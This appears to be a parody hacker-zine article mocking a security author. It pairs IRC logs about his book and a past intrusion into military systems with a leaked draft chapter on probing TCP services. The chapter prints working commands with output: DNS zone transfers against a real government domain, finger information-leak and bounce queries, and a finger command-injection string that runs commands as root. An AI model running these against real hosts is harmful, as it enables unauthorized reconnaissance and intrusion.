[15:10:46] <so1o> on windows network services
[15:10:53] <so1o> 135, 137, 138, 139, 445
[15:10:59] <so1o> laying it down straight
[15:11:10] <giles> i would be curoius on your section dealing with linux and
nix based security
[15:11:12] <so1o> like did u kno u can brute force passwords of users in the
administrators group
[15:11:20] <so1o> through the wmi interface accessible via. port 135
[15:11:29] <so1o> ?
[15:11:37] <giles> cool, i look forward to reading about that
[15:11:48] <so1o> and then, when you've brute forced the pass
[15:11:51] <so1o> u can execute commands
[15:11:54] <lord> psexec
[15:11:57] <giles> yeah
[15:11:58] <B-r00t> we could have a daily hack classs for each chapter ..
[15:11:59] <so1o> through tcp/135
[15:12:06] <so1o> lord whats psexec
[11:42:45] <so1o> the book is the bane of my life
[11:42:56] <B-r00t> will make good money do0d ..will be worth it .
[11:43:06] <so1o> str8 up
[11:43:33] <so1o> yeah well thats the plan
[11:43:41] <so1o> my hidden agenda is to put foundstone out of business
J/k!!!!!!!!!!!!!!!!!! ;)
12:09:43] <so1o> hm
[12:09:49] <so1o> i might save that for my second book
[12:09:55] <so1o> which is about internal security
[12:10:01] <Haggis> milk it dude!
[12:10:11] <so1o> ;]
[12:10:16] <so1o> well the whole point with this one
[12:10:20] <so1o> is that its under 300 pages
[12:10:25] <so1o> of remote stuff
[12:10:35] <so1o> if i start talking about local stuff
[12:10:39] <so1o> it will turn out being hacking exposed
[12:10:41] <so1o> all over AGAIN
[16:16:55] <so1o> i cant wait until my book is published and the matta
business collects our outstanding invoices in oct/nov
[16:17:02] <so1o> then i might be able to upgrade my car
[16:17:08] <so1o> i drive a 1.0 vw polo atm..
Thanks PHC, for sending me 3APA3A's wire tranfer #!
[23:42:54] <so1o> my bank account is in positive territory
[23:42:58] <so1o> for the first time in 2 years
[23:42:59] <so1o> easily
[23:43:15] <B-r00t> thats always a good thing ..
[23:43:16] <so1o> only because i consolidated my overdraft with one of my
natwest loans
[23:43:24] <B-r00t> med~ ..yer late been out on it ?
[23:43:24] <so1o> and oreilly wired me some more of my advance
[16:31:42] <so1o> i'm writing a book for o'reilly about security
[23:19:41] <so1o> K-SP1FF
[23:19:44] <so1o> SP1FFTASTIC
[23:19:45] <so1o> !!!!1
[23:19:56] <so1o> im writing a book about hacking
[23:20:03] <so1o> o'reilly are going to publish it
[23:20:06] <so1o> and 12308218214082480 hackers
[23:20:08] <so1o> will be BORN
[23:20:09] <so1o> !!!1
[23:20:24] <so1o> HACKING FOR CUNTS
[23:20:26] <so1o> !
[23:20:28] <giles_> hahah
[23:20:29] <so1o> no
[23:20:37] <so1o> "network security assessment"
[23:20:47] <so1o> hacking for cunts would be a good name tho
[23:23:42] <so1o> i gotta keep my book lean tho bro
[23:23:43] <so1o> no cd
[23:23:45] <so1o> paperback
[23:23:49] <so1o> 250 pages or so
[23:23:53] <so1o> to keep the costs down
[23:23:59] <so1o> so we can regulate hacking exposed
[23:24:05] <so1o> some sort of 80 bucks or something
[23:24:10] <so1o> and my book will be 25
INFORMATION MUST BE FREED!
[23:25:29] <so1o> ha
[23:25:37] <so1o> i dont care if people e-book and pir8 it
[23:25:49] <so1o> infact i might e-book it myself
[23:25:56] <so1o> with all the parts the publisher want to take out
[23:26:01] <so1o> well they dont atm
[23:26:11] <so1o> but if they do get me to take out my CIA examples
[23:26:12] <so1o> or whatnot
[23:26:17] <so1o> i'll put out an underground e-book
[23:26:22] <so1o> like the uncensored version
INFORMATION MUST BE FREED!
[23:25:56] <so1o> with all the parts the publisher want to take out
[23:26:01] <so1o> well they dont atm
[23:26:11] <so1o> but if they do get me to take out my CIA examples
[23:26:12] <so1o> or whatnot
[23:26:17] <so1o> i'll put out an underground e-book
[23:26:22] <so1o> like the uncensored version
[23:26:37] <so1o> oh in chapter 3
[23:26:46] <so1o> i explain how to map the cia's network
[23:26:48] <so1o> internally and shit
[23:27:01] <so1o> using whois, dns, sending mail to blahblah@ucia.gov
[23:27:02] <so1o> etc.
[23:27:08] <so1o> u can zone xfer the cia
[23:27:25] <so1o> dig @auth100.ns.uu.net ucia.gov axfr
[23:27:32] <so1o> its neat0
[23:28:05] <so1o> i wrote a white paper about it
[23:28:07] <so1o> for matta ages back
[23:28:11] <so1o> www.trustmatta.com/downloads/
[23:28:16] <so1o> - internet-based counterintelligence
[23:28:25] <so1o> oh and www.trustmatta.com/downloads/cia-map.jpg
[23:28:51] <so1o> ;; connect: Connection timed out
[23:28:51] <so1o> ; <<>> DiG 2.2 <<>> @auth100.ns.uu.net ucia.gov axfr
[23:28:51] <so1o> ; (1 server found)
[23:28:51] <so1o> ;; FROM: cyberforce to SERVER: 198.6.1.202
[23:28:51] <so1o> ;; WHEN: Tue Sep 30 00:55:32 2003
[23:28:58] <so1o> hm
[23:29:00] <so1o> timed out
[23:29:01] <so1o> http://www.trustmatta.com/services/docs/cia-map.jpg
[23:29:02] <so1o> even
[23:30:02] <so1o> ok
[23:39:46] <so1o> i got busted back in 1999
[23:39:54] <so1o> for hacking some *.spawar.navy.mil boxes
[23:39:59] <so1o> and trying to break into ncsc.mil
[23:40:02] <so1o> from there
[00:00:58] <so1o> so im writing a book for oreilly
[00:00:59] <so1o> they <3 me
[00:01:05] <so1o> they keep wiring me money
[00:01:10] <so1o> "i need more dollar"
[00:01:12] <so1o> "for my advance"
[00:01:19] <so1o> "plz send it ok thx!"
[15:44:08] <so1o> who the fuck are these dtors.net ppl
[15:44:11] <so1o> they look like students
[15:44:16] <so1o> fucking teenage students
[15:46:06] <so1o> anyhow dtors.net
[15:46:12] <so1o> who are those dropkickz
[15:46:35] <flame> one of them coded a sploit for ssl :| apartently works
[15:46:37] <so1o> webcamTASTIC
[15:46:48] <so1o> wrd
[15:46:52] <so1o> i dont see no working expl
[15:46:55] <so1o> maybe someone can hook me up
[11:02:59] <so1o> i'm writing a book for oreilly
[11:03:02] <so1o> if thatz what u mean
[11:03:20] <lewney> about security?
[11:03:27] <so1o> 'network security assessment'
[11:13:09] <so1o> my book is going to fuck the industry up
[11:13:15] <so1o> everything will be owned
[11:13:29] <so1o> the follow-up book will be the killer tho
[11:13:33] <so1o> about internal network security
[11:13:45] <so1o> and what u can do if you have access to the wire n shit
[11:13:56] <so1o> that wont be an oreilly book
[11:14:02] <so1o> im going to release that anonymously
[11:14:12] <so1o> through some publisher like no starch books or something
[13:51:42] <so1o> just mention the whole o'reilly book thing
[13:51:49] <so1o> and the fact that i will lock them down
[13:51:54] <so1o> like nobody ever has
[13:51:58] <so1o> i will rock them
[16:31:09] <so1o> it'll be out in january bro
[16:31:25] <so1o> the first 7 chapters (half the book) has been copy edited
and is ready to print
[16:31:37] <giles_> i thought you were pushing for NOV
[16:31:42] <giles_> as a relesase date
[16:31:44] <so1o> um
INFORMATION MUST BE FREED!
[16:43:36] <so1o> man i fucking hate oracle
[16:43:43] <so1o> i hate proprietary shit
[16:43:44] <so1o> :/
[16:43:59] <so1o> im writing about hacking the tns listener
[16:44:02] <so1o> for my oreilly book
[16:44:14] <so1o> and the more i research oracle
[16:44:18] <so1o> the more complex it becomes
[13:11:54] <so1o> my book will fuck shit upo
[13:11:56] <so1o> !!!!111
[13:11:59] <so1o> df did u kno
[13:12:02] <so1o> i am writing a book for oreilly
[13:12:04] <so1o> about hacking
[15:25:34] <so1o> my book is too darkside
[15:25:36] <so1o> to pdf
[13:14:56] <so1o> yeah i kno
[13:15:03] <so1o> dont want to make the book a big howto tho
[13:16:40] <so1o> i'll just put it in the 2nd edition due out in 2005
[13:18:45] <akriel> so1o, you wrote a book?
[13:18:48] <so1o> yeah for oreilly
[13:18:51] <giles> yo
[13:18:51] <so1o> on pentesting
[13:18:58] <akriel> so1o, what was title?
[13:19:10] <so1o> network security assessment
[13:19:12] <so1o> out in january 2004
[13:19:21] <akriel> you wrote the whole thing?
[13:19:31] <so1o> yeah
[12:11:53] <so1o> anyone got access to a solaris 9 box and nmap 3.45 or 3.48
[12:11:59] <so1o> i need an rpc scan result
[12:12:04] <so1o> to put in teh book
[15:26:29] <so1o> one day my book will be finished
[15:26:31] <so1o> and it will be good
[15:26:33] <so1o> until then
[15:26:34] <so1o> itz not
[15:33:01] <so1o> one day i might work at idefense
[15:33:05] <so1o> if they pay me
[15:47:23] <so1o> mine are hardcore tho
[15:47:36] <so1o> john mcdonald, ben laurie, jeff fay
[15:47:40] <so1o> and i tried to get david litchfield
[15:47:44] <so1o> but he didnt return emailz
Watch out for these advanced topics, coming in the sequel!
[11:50:11] <so1o> if i am talking about memory layout in intel x86
[11:50:12] <so1o> it goes..
[11:50:19] <so1o> text
[11:50:19] <so1o> data
[11:50:21] <so1o> bss
[11:50:22] <so1o> heap
[11:50:29] <so1o> stack
[11:50:40] <so1o> 0xffffffff
[11:50:41] <so1o> right
[11:50:52] <so1o> i mean its sparc which has the heap and stack upside down
right?
[11:51:34] <lewney> [text][data][<-- stack]
[11:51:40] <lewney> [data] [ bss ][ heap -->]
[11:51:43] <lewney> thats the layout
[11:51:44] <lewney> :)
[11:52:32] <so1o> hm
[11:52:35] <so1o> now you've confused me
[11:52:49] <so1o> i thought it was
[11:52:52] <so1o> 0x00000000
[11:52:53] <so1o> text
[11:52:54] <so1o> data
[11:52:55] <so1o> bss
[11:52:56] <so1o> heap
[11:52:57] <so1o> stack
[11:52:59] <so1o> 0xffffffff
[11:53:11] <so1o> and the heap/stack grow down/up accordingly
[11:53:32] <so1o> so you're saying its..
[11:53:39] <so1o> text
[11:53:39] <so1o> data
[11:53:40] <so1o> stack
[11:53:41] <so1o> data
[11:53:42] <so1o> bss
[11:53:43] <so1o> heap
[11:53:44] <so1o> ?
[11:54:17] <lewney> yeah at least I think it is :)
[11:54:29] <so1o> crazy bread
[11:54:47] <so1o> the diagram i got says runtime memory organization is
text, data,bss, heap, stack
[11:54:48] <so1o> :/
[11:54:55] <so1o> where did br00t ho
[11:54:56] <so1o> go
[11:55:23] <lewney> ill ask esdee
[11:55:28] <so1o> ok
[11:56:25] <lewney> nah its the first datagram
[11:56:26] <lewney> you were right
[11:57:12] <so1o> coo
[11:57:14] <so1o> where is esdee
[11:57:40] <lewney> msn
[11:57:40] <lewney> :P
[11:58:13] <so1o> i8
[11:58:35] <lewney> but the first one was right
[12:02:43] <so1o> ok
[12:02:57] <so1o> ask esdee which architectures turn heap and stack up the
other way
[12:03:02] <so1o> i think its only sparc
[12:05:49] <lewney> he says that on Solaris the heap gets mapped at a 0x4000
address
[12:06:02] <lewney> and the stack on an address like 0xfffe0000
[12:06:29] <so1o> heh crazy
[12:06:39] <so1o> which way do they grow though
[12:06:53] <so1o> does sparc stack grow from 0xffffe0000 down to 0xffffffff
[12:06:55] <so1o> or up
[12:07:03] <so1o> and same with heap
[12:11:31] <lewney> I've asked him
[12:11:57] <lewney> hmm so1o
[12:12:10] <lewney> it grows up
[12:12:39] <lewney> it being the stack
[12:12:44] <lewney> I have to be afk now
[12:12:49] <lewney> gonna buy diablo
[12:12:51] <lewney> bbiab
[12:15:24] <so1o> hm
[12:15:31] <so1o> maybe its the heap that grows the other way
[12:15:37] <so1o> i just remember horizon talking ages ago
[12:15:46] <so1o> about how sparc fucks with his head sometimes
Please email me if you find out the answer to this one!
[12:36:19] <so1o> when talking about text and bss segment
[12:36:20] <so1o> s
[12:36:27] <so1o> what does bss stand for?
|=[ EOF ]=---------------------------------------------------------------=|
Volume 0x0b, Issue 0x3f, Phile #0x0c of 0x0f
|=---------------------------=[ How to Hack ]=--------------------------=|
|=----------------------------------------------------------------------=|
|=------------------------------=[ so1o ]=------------------------------=|
1 - Introduction
2 - How Its Done
2.1 - Chapter 5, Assessing TCP Network Services
2.2 - Chapter 6, Assessing UDP Network Services
3 - Assorted IRC Logs - A Journey into My Psyche
--[ 1. Introduction
Friends! Confidence remains high in the hacking community as we enter
2004... despite what everybody says, the hacking scene is NOT dead!
As a token of my love, to all those people who supported my hacking
career by giving me warez and rootshells, to help me become the world's
foremost expert on ethical computer hacking that I am today, I would
like to offer this small token of my appreciation.
As many of you SHOULD know, I am publishing a book on attack and
penetration testing with O'reilly. Since my motto has always been
"Information needs to be freed!" I am offering you, free of charge,
and ready for immediate reading, 2 draft-cut chapters of my book.
Other infosec experts like Ryan Russell and Mike Schiffman "expose"
their hacking secrets to anybody with $45, but I'd like to send this
one out to the underground, on the house. I've chosen to include the
chapters as a standard ASCII text file, as opposed to a pdf or html,
so you can copy sections and paste them into the motd's of boxes
you have owned, so the administrators can figure out how they were
hacked and how to patch themselves.
--[ 2. How Its Done
----[ 2.1 Chapter 5, Assessing TCP Network Services
Assessing TCP Network Services
This chapter focuses on the technical execution of TCP network service
assessment. Common services (including FTP, SMTP, HTTP & POP3) are
accessible as plaintext network services, and so can be assessed easily
using simple scripts or even a telnet client. Services that use non-
plaintext proprietary protocols (including NetBIOS, SQL & LDAP) must
however be assessed using more complex scripts or auditing tools, which are
comprehensively covered in this chapter. Instead of comprehensively listing
each and every TCP network service in order of port number, you will find
that services have been grouped by their role (which will also help
highlight common vulnerabilities found in different types of TCP services).
The roles that TCP services have been grouped by are as follows:
Internal Services
Remote Information Services
Remote Maintenance Services
Microsoft Windows Networking Services
VPN & Remote Network Access Services
Network Proxy Services
E-Mail & News Services
Web Services
Database Services
Unix RPC Services
Print Services
Internal Services
A variety of operating systems including Cisco IOS, Windows 2000 and Linux
are often found to be running internal services. Such internal services are
historically used for network diagnostic and connectivity checking
purposes, and rarely have useful application in modern network
environments.
Internal TCP services are commonly defined within Unix and Windows services
files as the following (it should be noted that many of these services also
listen on UDP ports):
tcpmux 1/tcp
echo 7/tcp
discard 9/tcp
daytime 13/tcp
qotd 17/tcp
chargen 19/tcp
time 37/tcp
The echo, discard, qotd and chargen services provide little insight into
system configuration, and to date no direct system access can be gained
through these services. A denial of service attack can however be launched
if both echo and chargen are running.
Echo and Chargen Denial of Service
If host IP sequence numbers are easily predicted, a spoofed TCP session
can be initiated to confuse the target system into connecting to itself
from port 7 (echo) to port 19 (chargen) over TCP or UDP. The chargen
service generates a continuous stream of ASCII characters and sends them
to the echo service, causing them to be processed and echoed back.
Performance of devices with limited processing resources (such as entry-
level routers) can be degraded heavily with this type of attack. Denial
of Service tools such as fraggle target these internal services.
The TCP multiplexer service (tcpmux, running on TCP port 1) is common to
IRIX system platforms. The tcpmux service itself contains no known
vulnerabilities, but is an indicator of the hosts operating platform. The
service behaves much like an RPC portmapper, allowing for services to run
on arbitrary ports (described in RFC 1078).
The daytime and time services (running on TCP ports 13 and 37 respectively)
can be queried to deduce the time zone of the target system and its
approximate location, as shown in figure 22 below.
Figure 22: Using telnet to connect to the daytime service
# telnet 192.168.0.1 13
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Sat Jan 4 08:16:57 2003
Connection closed by foreign host.
Remote Information Services
Unix-based systems (including Linux, Solaris, FreeBSD and other variants)
and platforms such as Cisco IOS can be found to be running remote
information services that provide system, user and network details over
TCP/IP. Such services can be probed to collate username listings and
details of trusted networks and hosts, and in some cases compromise systems
directly.
A simple list of remote information services has been taken from the
services file:
systat 11/tcp
netstat 15/tcp
domain 53/tcp
finger 79/tcp
auth 113/tcp
ldap 389/tcp
Systat and Netstat
The systat and netstat services in particular are of interest, as current
network and system information can be easily gleaned through connecting to
the services using telnet. If we take a look at a Unix /etc/inetd.conf file
from a system running systat and netstat, we find:
systat stream tcp nowait root /usr/bin/ps ps
-ef
netstat stream tcp nowait root /usr/bin/netstat netstat
-a
Effectively, the ps -ef and netstat -a commands are bound to TCP ports 11
and 15 respectively. Figures 23 and 24 show live results accessed through
these services.
Figure 23: Linux system information gleaned through systat
# telnet 192.168.0.1 11
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan03 ? 00:00:05 init [2]
root 2 1 0 Jan03 ? 00:00:00 [keventd]
root 3 1 0 Jan03 ? 00:00:00
[ksoftirqd_CPU0]
root 4 1 0 Jan03 ? 00:00:00 [kswapd]
root 5 1 0 Jan03 ? 00:00:00 [bdflush]
root 6 1 0 Jan03 ? 00:00:00 [kupdated]
root 10 1 0 Jan03 ? 00:00:00 [khubd]
root 492 1 0 Jan03 ? 00:00:00 /sbin/syslogd
root 495 1 0 Jan03 ? 00:00:00 /sbin/klogd
root 503 1 0 Jan03 ? 00:00:00
/usr/sbin/dhcpd -q
root 512 1 0 Jan03 ? 00:00:00
/usr/sbin/inetd
root 520 1 0 Jan03 ? 00:00:00 /usr/sbin/sshd
daemon 523 1 0 Jan03 ? 00:00:00 /usr/sbin/atd
root 526 1 0 Jan03 ? 00:00:00 /usr/sbin/cron
root 531 1 0 Jan03 tty1 00:00:00 -bash
root 532 1 0 Jan03 tty2 00:00:00 /sbin/getty
38400 tty2
root 533 1 0 Jan03 tty3 00:00:00 /sbin/getty
38400 tty3
root 534 1 0 Jan03 tty4 00:00:00 /sbin/getty
38400 tty4
root 535 1 0 Jan03 tty5 00:00:00 /sbin/getty
38400 tty5
root 536 1 0 Jan03 tty6 00:00:00 /sbin/getty
38400 tty6
root 887 1 0 Jan03 ? 00:00:03
/usr/sbin/named
root 913 1 0 Jan03 ? 00:00:00 [eth0]
root 918 1 0 Jan03 ? 00:00:00 [eth1]
root 1985 520 0 08:05 ? 00:00:00 /usr/sbin/sshd
root 1987 1985 0 08:05 pts/0 00:00:00 -bash
root 2066 1987 0 10:44 pts/0 00:00:00 ps -ef
Figure 24: Linux system information gleaned through netstat
# telnet 192.168.0.1 15
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State
tcp 0 0 *:time *:*
LISTEN
tcp 0 0 *:discard *:*
LISTEN
tcp 0 0 *:daytime *:*
LISTEN
tcp 0 0 no-dns-yet.demon:domain *:*
LISTEN
tcp 0 0 192.168.0.1:domain *:*
LISTEN
tcp 0 0 mail:domain *:*
LISTEN
tcp 0 0 *:ssh *:*
LISTEN
tcp 0 0 *:smtp *:*
LISTEN
tcp 0 52 no-dns-yet.demon.co:ssh pc-62-20-40-1-
az.b:3526 ESTABLISHED
udp 0 0 *:32769 *:*
udp 0 0 *:discard *:*
udp 0 0 no-dns-yet.demon:domain *:*
udp 0 0 192.168.0.1:domain *:*
udp 0 0 mail:domain *:*
udp 0 0 *:bootps *:*
raw 0 0 *:icmp *:*
7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 5 [ ] DGRAM 456
/dev/log
unix 2 [ ACC ] STREAM LISTENING 1125
/var/run/ndc
unix 2 [ ] DGRAM 1123
unix 2 [ ] DGRAM 516
unix 2 [ ] DGRAM 489
This detailed system information gives insight into the following areas of
the target environment:
Processes running on the target host
2. User names of process owners that can be later used to undertake brute
force password guessing attacks to gain access to network components
3. Sensitive details within process strings (such as a SQL query run from
the command line containing both the SQL server IP address and
password details)
Details of current network connections to internal and trusted hosts
DNS
The Domain Name System is primarily used across UDP and so assessment
techniques are comprehensively covered in Chapter 6. Most DNS servers do
also listen on TCP port 53 for DNS zone transfer purposes when secondary
name servers request the latest DNS zone file from the primary name server.
As discussed earlier in Chapter 3, a DNS zone file contains all of the
naming information that the name server stores regarding a specific DNS
domain. A DNS zone transfer can often be launched to retrieve details of
non-public internal networks and other useful information that can be used
to build an accurate map of the target infrastructure.
It is strongly recommended, for reasons of load balancing and fault
tolerance, that organizations use more than one name server. The main name
server is known as the primary name server, and all subsequent name servers
are secondary name servers. Either a primary or secondary name server can
be queried for name resolution, so it is necessary that the DNS information
residing on each name server is current. To ensure this is the case, when a
secondary name server is started and at regular, specifiable intervals
thereafter, it requests a complete listing of the computers it is
responsible for from the primary name server. The process of requesting and
receiving this information is a zone transfer.
Windows tools such as nslookup and the Sam Spade Windows client (available
from www.samspade.org) can be used to perform a DNS zone transfer (as
detailed earlier in Chapter 3), but the most effective method is to issue a
DNS zone transfer request against a specific DNS server is to use the Unix
dig command:
# dig @auth100.ns.uu.net ucia.gov axfr
; <<>> DiG 9.2.1 <<>> @auth100.ns.uu.net ucia.gov axfr
;; global options: printcmd
ucia.gov. 86400 IN SOA ain-
relay1.net.cia.gov.ucia.gov.
root.puff.ucia.gov. 301033806 7200 3600 604800 86400
ucia.gov. 86400 IN NS
relay1.ucia.gov.
ucia.gov. 86400 IN NS
auth100.ns.uu.net.
ucia.gov. 86400 IN MX 5
relay2.ucia.gov.
relay2-qfe0.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay1-qfe0.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
ain-relay1-ext.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
ex-rtr-191-a.ucia.gov. 86400 IN A 192.103.66.58
ain-relay11-ext.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
ex-rtr-191-b.ucia.gov. 86400 IN A 192.103.66.62
relay.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
relay2-int.ucia.gov. 86400 IN CNAME ain-relay2-
le1.ucia.gov.
ain-relay11-qfe0.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
relay11-int.ucia.gov. 86400 IN A 192.168.64.4
ain.ucia.gov. 86400 IN A 198.81.128.68
foia.ucia.gov. 86400 IN CNAME
www.foia.ucia.gov.
relay11.ucia.gov. 86400 IN A 198.81.129.195
ain-relay2-ext.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay1-ext.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
relay11-qfe0.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
relay2t.ucia.gov. 86400 IN A 198.81.129.34
ain-relay2-qfe1.ucia.gov. 86400 IN A 192.168.64.3
ain-relay1-qfe0.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
ain-relay1-qfe1.ucia.gov. 86400 IN A 192.168.64.2
ex-rtr.ucia.gov. 86400 IN CNAME ex-rtr-
129.ucia.gov.
wais.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay2-ext.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
ain-relay1-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
ain-relay.ucia.gov. 86400 IN CNAME
relay1.ucia.gov.
relay11-ext.ucia.gov. 86400 IN CNAME
relay11.ucia.gov.
relay1.ucia.gov. 86400 IN A 198.81.129.193
relay2.ucia.gov. 86400 IN A 198.81.129.194
ain-relay-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
relay-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
ex-rtr-129.ucia.gov. 86400 IN HINFO "Cisco 4000
Router" "NP-1E Board
"
ex-rtr-129.ucia.gov. 86400 IN A 198.81.129.222
ain-relay2-int.ucia.gov. 86400 IN CNAME ain-relay2-
le1.ucia.gov.
ain-relay2-le0.ucia.gov. 86400 IN CNAME
relay2.ucia.gov.
relay1-int.ucia.gov. 86400 IN CNAME ain-relay1-
qfe1.ucia.gov.
ucia.gov. 86400 IN SOA ain-
relay1.net.cia.gov.ucia.gov.
root.puff.ucia.gov. 301033806 7200 3600 604800 86400
;; Query time: 169 msec
;; SERVER: 198.6.1.202#53(auth100.ns.uu.net)
;; XFR size: 41 records
Finger
The finger service is commonly found listening on TCP port 79 of devices
such as Cisco routers and managed switches. Default out-the-box builds of
many commercial Unix-based systems run the service (including Solaris and
BSDI).
The finger service can be queried using either the finger client (found in
most operating platforms) or by directly using telnet and connecting to
port 79. Figures 25 and 26 follow, showing the difference in results from
fingering a Cisco IOS device and a Solaris server.
Figure 25: A finger query against a Cisco router using telnet
# telnet 192.168.0.1 79
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Line User Host(s) Idle Location
* 1 vty 0 idle 00:00:00
192.168.0.252
Se0 Sync PPP 00:00:00
Connection closed by foreign host.
Figure 26: Using the finger client to query a Solaris server
# finger @192.168.0.10
[192.168.0.10]
Login Name TTY Idle When
Where
crm Chris McNab pts/0 1 Tue 09:08
192.168.0.252
axd Andrew Done pts/4 3d Thu 11:57
192.168.0.251
A null query will result in the current users being shown under most finger
services. From analyzing the format of the response, we can easily
differentiate a Cisco finger service from that running on a Solaris host.
Finger Information Leak Bugs
Various information leak vulnerabilities exist in finger implementations,
of which a popular attack involves a '1 2 3 4 5 6 7 8 9 0' request against
a Solaris host running fingerd. This following bug shown in figure 27 is
present in all Solaris releases up to 8:
Figure 27: Using a malformed finger request to glean user details
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
[192.168.0.10]
Login Name TTY Idle When
Where
root Super-User console <Jun 3 17:22> :0
admin Super-User console <Jun 3 17:22> :0
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
adm Admin < . . . . >
lp Line Printer Admin < . . . . >
uucp uucp Admin < . . . . >
nuucp uucp Admin < . . . . >
listen Network Admin < . . . . >
nobody Nobody < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x Nobody < . . . . >
informix Informix User < . . . . >
crm Chris McNab pts/0 1 Tue 09:08
192.168.0.252
axd Andrew Done pts/4 3d Thu 11:57
192.168.0.251
Many Unix-based finger services perform a simple cross-reference operation
of the query string against user information fields in the /etc/passwd
file, and so the following finger query strings can be used to glean useful
information:
finger .@target.host
finger 0@target.host
finger **@target.host
finger user@target.host
Finger Redirection
In some cases, servers running finger will exist on multiple networks (such
as the Internet and an internal network space). With knowledge of internal
IP ranges and host names, it is often possible to perform a finger bounce
attack to glean internal user names and host details as shown in figure 28
below.
Figure 28: Using finger to redirect a request to an internal host
# finger @192.168.0.10@217.34.317.200
[217.34.217.200]
[192.168.0.10]
Login Name TTY Idle When
Where
crm Chris McNab pts/0 1 Tue 09:08
192.168.0.252
axd Andrew Done pts/4 3d Thu 11:57
192.168.0.251
Directly Exploitable Finger Bugs
Poorly written finger implementations will allow attackers to pipe commands
through finger which are in turn run on the target host by the owner of the
service process (such as root or bin under Unix-based systems). Figure 29
below shows an example of a vulnerable finger service running on a
vulnerable DG-UX platform.
Figure 29: Issuing id and netstat commands through finger
# finger "|/bin/id@192.168.0.135"
[192.168.0.135]
uid=0(root) gid=0(root)
# finger "|/bin/netstat@192.168.0.135"
[192.168.0.135]
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address
State
tcp 0 0 localhost.localdo:45233
localhost.localdo:45232 ESTABLISHED
tcp 0 0 localhost.localdo:45232
localhost.localdo:45233 ESTABLISHED
tcp 0 0 localhost.localdo:45235
localhost.localdo:45234 ESTABLISHED
tcp 0 0 localhost.localdo:45234
localhost.localdo:45235 ESTABLISHED
tcp 0 0 localhost.localdo:45237
localhost.localdo:45236 ESTABLISHED
tcp 0 0 localhost.localdo:45236
localhost.localdo:45237 ESTABLISHED
tcp 0 11433 mdma.lab.org:http
62.167.163.193:3414 ESTABLISHED
tcp 0 0 localhost.localdo:45229
localhost.localdo:45228 ESTABLISHED
tcp 0 0 localhost.localdo:45228
localhost.localdo:45229 ESTABLISHED
tcp 0 0 localhost.localdo:45231
localhost.localdo:45230 ESTABLISHED
tcp 0 0 localhost.localdo:45230
localhost.localdo:45231 ESTABLISHED
tcp 0 0 el8.net:ssh
195.188.198.198:38930 ESTABLISHED
tcp 0 0 el8.net:34785
209.126.200.130:ircd ESTABLISHED
Serious buffer overflow vulnerabilities exist in many Linux fingerd
packages, including cfingerd. At the time of writing, cfingerd 1.4.3 and
prior running on Linux (packaged with Debian and Red Hat in particular) is
especially susceptible to a plethora of remote and locally exploitable
bugs. For current details of publicly available fingerd exploits, you can
search Packet Storm's archives for 'finger exploit'.
Auth
The Unix auth service (also known as identd) listens on TCP port 113. The
primary purpose of auth is to provide a degree of authentication through
mapping local user names to TCP network ports being used. IRC (Internet
Relay Chat) is a good example of this, as when a user connects to an IRC
server, an auth request is sent to TCP port 113 of the host to retrieve the
user's current login name.
The auth service can be queried in-line with RFC 1413 to match open TCP
ports on the target host with local usernames. This username information
has two different uses to an attacker:
To derive the owners of processes with open ports
If for example, a vulnerable version of BIND is found to be running on a
target server and TCP port 113 is also open, an identd cross-referenced
port scan will reveal the user running the BIND process on the server. If
the process is owned by named (as opposed to root), then the BIND process
may exist in a chroot jail and be difficult to compromise.
To enumerate and list valid usernames
From enumerating valid user login details, an attacker can seek to launch
brute force attacks and take advantage of weak password policies.
Nmap has the capability to cross-reference open ports with identd. Figure
30 below shows such an identd scan being run to identify a handful of
active user accounts.
Figure 30: Nmap being used to perform identd cross-referencing
# nmap -I -sS 192.168.0.10
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on dockmaster (192.168.0.10):
(The 1595 ports scanned but not shown below are in state:
closed)
Port State Service Owner
22/tcp open ssh root
25/tcp open smtp root
80/tcp open http nobody
110/tcp open pop-3 root
113/tcp open auth ident
8080/tcp open http-proxy nobody
The Linux jidentd and cidentd packages contain various buffer overflow
vulnerabilities. It is highly recommended that research is undertaken when
assessing servers found to have identd running, including enumeration of
the operating platform to ascertain the probable type of identd service
running.
Rusers
The Unix rusersd service is an RPC (Remote Procedure Call) service that
listens on a dynamic TCP port. The rusers client utility first connects to
the RPC portmapper on TCP port 111, which returns the whereabouts of the
rusers service if it is indeed active.
If during initial TCP port scans, the RPC portmapper service is not found
to be accessible on TCP port 111, it is highly unlikely that rusersd will
be running. However if TCP port 111 is found to be accessible, the rpcinfo
client can be used to check for the presence of rusersd and other
accessible RPC services as detailed below in figure 31.
Figure 31: Using rpcinfo to retrieve details of active RPC services
# rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
